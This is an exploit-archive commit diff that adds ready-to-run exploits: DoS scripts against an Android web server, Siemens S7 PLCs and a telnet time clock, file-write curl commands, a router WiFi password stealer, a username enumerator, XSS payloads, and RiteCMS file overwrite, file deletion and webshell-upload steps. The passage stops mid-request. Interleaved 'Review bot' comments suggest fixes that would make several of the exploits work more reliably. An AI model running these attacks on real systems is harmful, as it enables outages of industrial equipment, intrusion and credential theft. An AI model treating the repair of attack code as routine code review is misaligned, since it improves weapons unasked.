DB: 2022-01-06

32 changes to exploits/shellcodes

Siemens S7 Layer 2 - Denial of Service (DoS)
TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
Automox Agent 32 - Local Privilege Escalation
ConnectWise Control 19.2.24707 - Username Enumeration
Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
AWebServer GhostBuilding 18 - Denial of Service (DoS)
TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
Dixell XWEB 500 - Arbitrary File Write
Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
CMSimple 5.4 - Cross Site Scripting (XSS)
RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
Nettmp NNT 5.1 - SQLi Authentication Bypass
Hostel Management System 2.1 - Cross Site Scripting (XSS)
Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
Hospitals Patient Records Management System 1.0 - Account TakeOver
Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
openSIS Student Information System 8.0 - 'multiple' SQL Injection
Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)
WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
This commit is contained in:
Offensive Security 2022-01-06 05:01:54 +00:00
parent 00cc9f489e
commit 1472d8e723
33 changed files with 1988 additions and 0 deletions


@ -0,0 +1,85 @@
# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS)
# Date: 28/12/2021
# Exploit Author: Andres Ramos [Invertebrado]
# Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm
# Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en
# Version: AWebServer GhostBuilding 18
# Tested on: Android
#!/usr/bin/python3
# *********************************************************************************
# * Author: Andres Ramos [Invertebrado] *
# * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash *
# *********************************************************************************
import signal
import requests
from pwn import *
#Colors
class colors():
GREEN = "\033[0;32m\033[1m"
END = "\033[0m"
RED = "\033[0;31m\033[1m"
BLUE = "\033[0;34m\033[1m"
YELLOW = "\033[0;33m\033[1m"
PURPLE = "\033[0;35m\033[1m"
TURQUOISE = "\033[0;36m\033[1m"
GRAY = "\033[0;37m\033[1m"
exit = False
def def_handler(sig, frame):
print(colors.RED + "\n[!] Exiting..." + colors.END)
exit = True
sys.exit(0)
if threading.activeCount() > 1:
os.system("tput cnorm")
os._exit(getattr(os, "_exitcode", 0))
else:
os.system("tput cnorm")
sys.exit(getattr(os, "_exitcode", 0))
signal.signal(signal.SIGINT, def_handler)
if len(sys.argv) < 3:
print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END)
sys.exit(1)
url = sys.argv[1]
Tr = sys.argv[2]
def http():
counter = 0
p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END)
while True:
r = requests.get(url)
r = requests.get(url + "/mysqladmin")
counter += 2
p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END)
if exit:
break
if __name__ == '__main__':
threads = []
try:
for i in range(0, int(Tr)):
t = threading.Thread(target=http)
threads.append(t)
sys.stderr = open("/dev/null", "w")
for x in threads:
x.start()
for x in threads:
x.join()
except Exception as e:
log.failure(str(e))
sys.exit(1)
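Review bot: `exit = True` inside `def_handler` binds a new local rather than the module-level flag, so the `if exit: break` check in `http()` never fires and the non-daemon worker threads keep running after the handler's `sys.exit(0)`; the lines after that `sys.exit(0)` are also unreachable. Declaring `global exit` as the handler's first statement (or creating the threads with `daemon=True`) lets the interrupt actually stop the process. The flag name shadows the builtin `exit`; `stop_requested` would avoid that, and the `sys.stderr = open("/dev/null", "w")` handle is never closed. `sys`, `threading` and `os` are only in scope through `from pwn import *`, which is worth making explicit with `import os, sys, threading`.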

105
exploits/hardware/dos/50613.py Executable file

@ -0,0 +1,105 @@
# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
# Date: 21/10/2021
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/us/en.html
# Version: Firmware versions >= 3
# Tested on: Siemens S7-300, S7-400 PLCs
#!/usr/bin/python3
from scapy.all import *
from colorama import Fore, Back, Style
from subprocess import Popen, PIPE
from art import *
import threading
import subprocess
import time
import os
import sys
import re
# Banner
print(Fore.RED + r"""
· ·. ·
· ·
. · .
·. ·.
.
. ·. ·
.· ·· ·
. ·· .
· ·.
. .
""")
time.sleep(1.5)
# Get IP to exploit
IP = input("Enter the IP address of the device to exploit: ")
# Find the mac address of the device
Mac = getmacbyip(IP)
# Function to send the ouput to "nothing"
def NULL ():
f = open(os.devnull, 'w')
sys.stdout = f
# Eternal loop to produce DoS condition
def Arnold ():
AutomatorTerminator = True
while AutomatorTerminator == True:
Packet = Ether()
Packet.dst = "00:00:00:00:00:00"
Packet.src = Mac
sendp(Packet)
NULL()
def Sarah ():
AutomatorTerminator = True
while AutomatorTerminator == True:
Packet = Ether()
Packet.dst = "00:00:00:00:00:00"
Packet.src = Mac
sendp(Packet)
NULL()
def Kyle ():
AutomatorTerminator = True
while AutomatorTerminator == True:
Packet = Ether()
Packet.dst = "00:00:00:00:00:00"
Packet.src = Mac
sendp(Packet)
NULL()
# Arnold
ArnoldThread = threading.Thread(target=Arnold)
ArnoldThread.start()
ArnoldThread.join()
NULL()
# Sarah
SarahThread = threading.Thread(target=Sarah)
SarahThread.start()
SarahThread.join()
NULL()
# Kyle
KyleThread = threading.Thread(target=Kyle)
KyleThread.start()
KyleThread.join()
NULL()
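Review bot: `Mac = getmacbyip(IP)` is used unchecked; scapy's `getmacbyip` returns `None` when the address cannot be resolved, and the loops in `Arnold`/`Sarah`/`Kyle` would then set `Packet.src = None` on every frame. A guard right after the lookup, `if Mac is None: sys.exit("Could not resolve MAC for " + IP)`, makes that failure explicit instead of silent. `NULL()` opens `os.devnull` on every call and rebinds `sys.stdout` without closing the previous handle. The three worker functions are byte-identical, and because `ArnoldThread.join()` blocks on a loop that never terminates, `Sarah`, `Kyle` and the trailing `NULL()` calls are effectively dead code; one function plus a comment stating that the script never returns would be clearer.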


@ -0,0 +1,41 @@
# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
# Discovered by: Yehia Elghaly
# Discovered Date: 22/12/2021
# Vendor Homepage: https://www.accu-time.com/
# Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/
# Tested Version: 1.0
# Vulnerability Type: Buffer Overflow (DoS) Remote
# Tested on OS: linux
# Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow
# Steps to reproduce:
# 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23
# 2. - Run the Script from remote PC/IP
# 3. - Telnet Crashed
#!/usr/bin/env python3
import socket
import sys
print("#######################################################")
print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #")
print("# -------------------------- #")
print("# BY Yehia Elghaly #")
print("#######################################################")
if (len(sys.argv)<2):
print ("Usage: %s <Target Host> ") % sys.argv[0]
print ("Example: %s 192.168.113.1 ") % sys.argv[0]
exit(0)
print ("\nSending Evil.......Buffer...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((sys.argv[1], 23))
buffer = "A"*9400
s.send(" Crashed Check the connection")
Print ("Crashed")
except:
print ("Could not connect to ACCU Time Telnet!")
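Review bot: The bare `except:` at the end of the hunk reports every failure as a connection error: `Print` is an undefined name, `s.send(" Crashed Check the connection")` passes a `str` to a socket under the `python3` shebang, and `print ("Usage: %s <Target Host> ") % sys.argv[0]` in the usage branch applies `%` to `None`. Narrowing the handler to `except OSError as e:` and printing `e`, and correcting `Print` to `print`, would surface these instead of masking them. The 9400-byte `buffer` is assigned but never referenced, so as published the script does not exercise the condition its header describes; the header and the code should be reconciled or a `# NOTE: buffer is unused in this revision` comment added so reviewers are not misled.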


@ -0,0 +1,29 @@
# Exploit Title: Dixell XWEB-500 - Arbitrary File Write
# Google Dork: inurl:"xweb500.cgi"
# Date: 03/01/2022
# Exploit Author: Roberto Palamaro
# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it
# Version: XWEB-500
# Tested on: Dixell XWEB-500
# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/
# Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability
# Endpoint: logo_extra_upload.cgi
# Here the first line of the POC is the filename and the second one is the content of the file be written
# Write file
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify
curl -A Chrome -is "http://[target]:[port]/logo/"
# Endpoint: lo_utils.cgi
# Here ACTION=5 is to enable write mode
echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify using ACTION=3 to listing resources
echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Endpoint: cal_save.cgi
# Here the first line of the POC is the filename and the second one is the content of the file be written
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify
curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi
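Review bot: The `# Version: XWEB-500` header repeats the model name rather than an affected firmware version, and the advisory states no vendor fix status, so a reader cannot tell which builds are affected or whether an update exists. Suggest `# Version: <affected firmware build>` with the real value and a `# Fixed in:` line if the vendor has published one. The write-side `curl` commands pass `-k`, which disables certificate verification; a comment such as `# -k: TLS verification skipped -- state why` next to the first one would document the choice.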


@ -0,0 +1,27 @@
# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
# Date: 01/01/2022
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.vodafone.es/
# Software Link: N/A
# Version: Firmware version Vodafone-H-500-s-v3.5.10
# Hardware model: Sercomm VFH500
# The WiFi access point password gets disclosed just by performing a GET request with certain headers
import requests
import sys
import json
if len(sys.argv) != 2:
print("Usage: python3 vodafone-pass-disclose.py http://IP")
sys.exit()
url = sys.argv[1]+"/data/activation.json"
cookies = {"pageid": "129"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-
Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-
With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"}
req=requests.get(url, headers=headers, cookies=cookies)
result=json.loads(req.text)[3].get("wifi_password")
print("[+] The wifi password is: "+result)
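Review bot: `json.loads(req.text)[3].get("wifi_password")` assumes a successful response, a JSON list with at least four entries and a non-`None` value, and `"[+] The wifi password is: "+result` raises `TypeError` when the key is absent; add `req.raise_for_status()` after the request and check `result is not None` before concatenating. The request also sets no `timeout`, so an unresponsive host hangs the script indefinitely. As printed, the `headers` literal has string values broken across lines (`Gecko/20100101` / `Firefox/78.0`, `Accept-` / `Language`, `X-Requested-` / `With`), which is a `SyntaxError` unless this is a display artefact of the page.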

178
exploits/multiple/remote/50618.py Executable file

@ -0,0 +1,178 @@
# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration
# Date: 17/12/2021
# Exploit Author: Luca Cuzzolin aka czz78
# Vendor Homepage: https://www.connectwise.com/
# Version: vulnerable <= 19.2.24707
# CVE : CVE-2019-16516
# https://github.com/czz/ScreenConnect-UserEnum
from multiprocessing import Process, Queue
from statistics import mean
from urllib3 import exceptions as urlexcept
import argparse
import math
import re
import requests
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
headers = []
def header_function(header_line):
headers.append(header_line)
def process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy):
try:
# Payload to dictionary
payload_dict = {}
for load in payload:
split_load = load.split(":")
if split_load[1] != '{USER}':
payload_dict[split_load[0]] = split_load[1]
else:
payload_dict[split_load[0]] = '{USER}'
# Enumeration
total = len(wordlist)
for counter, user in enumerate(wordlist):
user_payload = dict(payload_dict)
for key, value in user_payload.items():
if value == '{USER}':
user_payload[key] = user
dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1]
headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies)
x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items())
if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')):
queue.put((proc_id, "FOUND", user))
found_queue.put((proc_id, "FOUND", user))
if stop: break
elif verbose:
queue.put((proc_id, "TRIED", user))
queue.put(("PERCENT", proc_id, (counter/total)*100))
except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError):
print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id))
if __name__ == "__main__":
# Arguments
parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool")
parser.add_argument("url", help="http://example.com/Login")
parser.add_argument("wordlist", help="username wordlist")
parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems")
parser.add_argument("-v", action="store_true", help="verbose mode")
parser.add_argument("-s", action="store_true", help="stop on first user found")
parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050")
args = parser.parse_args()
# Arguments to simple variables
wordlist = args.wordlist
url = args.url
payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:']
verbose = args.v
thread_count = args.c
failstr = "PasswordInvalid"
stop = args.s
proxy= args.p
print(bcolors.HEADER + """
__ ___ __ ___
| | |__ |__ |__) |__ |\ | | | |\/|
|__| ___| |___ | \ |___ | \| |__| | |
ScreenConnect POC by czz78 :)
"""+ bcolors.ENDC);
print("URL: "+url)
print("Payload: "+str(payload))
print("Fail string: "+failstr)
print("Wordlist: "+wordlist)
if verbose: print("Verbose mode")
if stop: print("Will stop on first user found")
proxies = {'http': '', 'https': ''}
if proxy:
proxies = {'http': proxy, 'https': proxy}
print("Initializing processes...")
# Distribute wordlist to processes
wlfile = open(wordlist, "r", encoding="ISO-8859-1") # or utf-8
tothread = 0
wllist = [[] for i in range(thread_count)]
for user in wlfile:
wllist[tothread-1].append(user.strip())
if (tothread < thread_count-1):
tothread+=1
else:
tothread = 0
# Start processes
tries_q = Queue()
found_q = Queue()
processes = []
percentage = []
last_percentage = 0
for i in range(thread_count):
p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy))
processes.append(p)
percentage.append(0)
p.start()
print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC)
# Main process loop
initial_count = len(processes)
while True:
# Read the process output queue
try:
oldest = tries_q.get(False)
if oldest[0] == 'PERCENT':
percentage[oldest[1]] = oldest[2]
elif oldest[1] == 'FOUND':
print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
elif verbose:
print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
except: pass
# Calculate completion percentage and print if /10
total_percentage = math.ceil(mean(percentage))
if total_percentage % 10 == 0 and total_percentage != last_percentage:
print("{}% complete".format(total_percentage))
last_percentage = total_percentage
# Pop dead processes
for k, p in enumerate(processes):
if p.is_alive() == False:
processes.pop(k)
# Terminate all processes if -s flag is present
if len(processes) < initial_count and stop:
for p in processes:
p.terminate()
# Print results and terminate self if finished
if len(processes) == 0:
print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC)
while True:
try:
entry = found_q.get(False)
print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC)
except:
break
quit()
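Review bot: `process_enum` reads `proxies` on the `requests.request(...)` line but only `proxy` is passed in; `proxies` is a module-level name assigned under `__main__`, so this works only where child processes are forked and raises `NameError` under the spawn start method. Building it locally, `proxies = {'http': proxy, 'https': proxy} if proxy else {'http': '', 'https': ''}`, removes the dependency on the parent's globals and makes the `proxy` parameter meaningful. The main loop also `pop`s from `processes` while enumerating it, which skips the element after each removed one, and `except: pass` around `tries_q.get(False)` swallows more than the expected `queue.Empty`. `headers` and `header_function` near the top are unused.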


@ -0,0 +1,40 @@
# Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Google Dork: intext:"BeyondTrust" "Redistribution Prohibited"
# Date: 30/12/2021
# Exploit Author: Malcrove
# Vendor Homepage: https://www.beyondtrust.com/
# Version: v6.0 and earlier versions
Summary:
Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
Vulnerability Details:
Affected Endpoint: /appliance/login
Affected Parameter: login[password]
Request Method: GET or POST
Proof of concept (POC):
By navigating to the below link from a modern web browser, alert(document.domain) Javascript method would be fired in the same context of Beyondtrust Remote Support domain.
http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password
Mitigation:
A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version.
- Time-Line:
April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust)
April 8, 2021: Recevied an initial reply from the vendor
Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1
Dec 30, 2021: The Responsible public disclosure
- Credits
Ahmed Aboul-Ela (Malcrove)
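Review bot: The header says `# Version: v6.0 and earlier versions` while the Summary says the base software is affected "through 6.0.1" and the Mitigation section places the fix in NSBase 6.1; the three should agree so readers know whether 6.0.1 is affected. `# Version: <= 6.0.1 (fixed in NSBase 6.1)` would state both in one place. The Summary also misspells "acheive" and the timeline "Recevied".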


@ -0,0 +1,30 @@
# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
# Date: 22/10/2021
# Exploit Author: heinjame
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/?Downloads
# Version: <=5.4
# Tested on: Linux os
[Description]
Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding.
So the application let's attacker perform DOM based XSS.
[Payload and POC]
File > images > Upload a file
Attack vector >> ')-alert(1)// (need to encode)>>
&#39;&#41;&#45;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#47;&#47;
When the victim clicks the delete button,an alert will be executed.
Script to encode the payload
payload = input()
finalpayload = ""
for i in payload:
finalpayload = finalpayload + "&#" + str(ord(i)) + ";"
print(finalpayload)
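Review bot: The description says the input is filtered with `preg_replace` but names neither the file nor the function, so the root cause cannot be checked against the source; a line such as `# Affected code: <file>:<function>` would make the claim verifiable. The payload is stored in an uploaded filename and fires when the delete button is clicked, which reads as stored rather than "DOM based" XSS as the description states; worth confirming and aligning the wording. The encoder's `finalpayload = finalpayload + "&#" + str(ord(i)) + ";"` loop is a string-concatenation loop; `"".join(f"&#{ord(c)};" for c in payload)` is the idiomatic form. "attackers can able to bypass" should read "attackers are able to bypass".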


@ -0,0 +1,110 @@
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b
################
# Description #
################
# RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the capability of arbitrary file overwrite to modify existing file such as /etc/passwd or /etc/shadow if the current PHP process user is run as root.
############################################################
# PoC to overwrite existing index.php to display phpinfo() #
############################################################
Steps to Reproduce:
1. Login as admin
2. Go to File Manager
3. Then, click Upload file > Browse..
4. Upload any file and click checkbox name "overwrite file with same name"
4. Intercept the request and replace current file name to any files path on the server via parameter "file_name".
PoC: param file_name - to overwrite index.php to display phpinfo, so the payload will be "../index.php"
param filename - with the content of "<?php phpinfo(); ?>"
Request:
========
POST /ritecmsv3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298
Content-Length: 1840
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="mode"
filemanager
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file"; filename="anyfile.txt"
Content-Type: application/octet-stream
content of the file to overwrite here
-- this is example to overwrite index.php to display phpinfo --
<?php phpinfo(); ?>
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="directory"
media
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file_name"
../index.php
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="overwrite_file"
true
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_mode"
1
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize_xy"
x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize"
640
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="compression"
80
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize_xy"
x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize"
150
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_compression"
70
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_file_submit"
OK - Upload file
-----------------------------351719865731412638493510448298--
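Review bot: The Steps to Reproduce number both the upload step and the intercept step as `4.`, and the advisory gives no vendor response or fix status even though the header says `# Version: <= 3.1.0`. Renumber the second `4.` to `5.` and add a `# Vendor status:` line (the real value, or "none at time of writing") so readers can tell whether an upgrade mitigates this; the same missing status applies to the two companion RiteCMS advisories in this commit (Arbitrary File Deletion and RCE). The `PHPSESSID` and `Host: localhost` values in the sample request are fixtures and could be labelled as such.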


@ -0,0 +1,53 @@
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd
################
# Description #
################
# RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.
#####################################################
# PoC to delete secretConfig.conf file in web root #
#####################################################
Steps to Reproduce:
1. Login as admin
2. Go to File Manager
3. Delete any file
4. Intercept the request and replace current file name to any files on the server via parameter "delete".
# Assumed there is a secretConfig.conf file in web root
PoC: param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf"
Request:
========
GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
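Review bot: The sample request's `Cookie: PHPSESSID=...` and `Host: localhost` are fixture values from the author's test install, but nothing says so; a comment such as `# Request captured against a local XAMPP install; session cookie is a fixture` above `Request:` would keep readers from treating them as significant. The Description says the deletion can remove `.htaccess` protections, which the RCE advisory in this commit relies on as its Method 1; a one-line cross-reference between the two would help a reader assess combined impact.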


@ -0,0 +1,143 @@
# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Google Dork: intext:"Powered by RiteCMS"
# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597
"""
################
# Description #
################
# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default.
# There are 4 ways of bypassing the current file upload protection to achieve remote code execution.
# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved
# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved
# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved
By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability.
Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root
body= Content-Disposition: form-data; name="file_name"
body= ../webrootExec.php
So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php
# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved
$ cat .htaccess
<Files *.php>
deny from all
</Files>
<Files ~ "webshell\.php$">
Allow from all
</Files>
###################################
# PoC for webshell using Method 2 #
###################################
Steps to Reproduce:
1. Login as admin
2. Go to Files Manager
3. Choose a directory to upload .php file either media or files directory.
4. Then, click Upload file > Browse..
3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess
4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory
Request:
========
POST /ritecms.v3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309
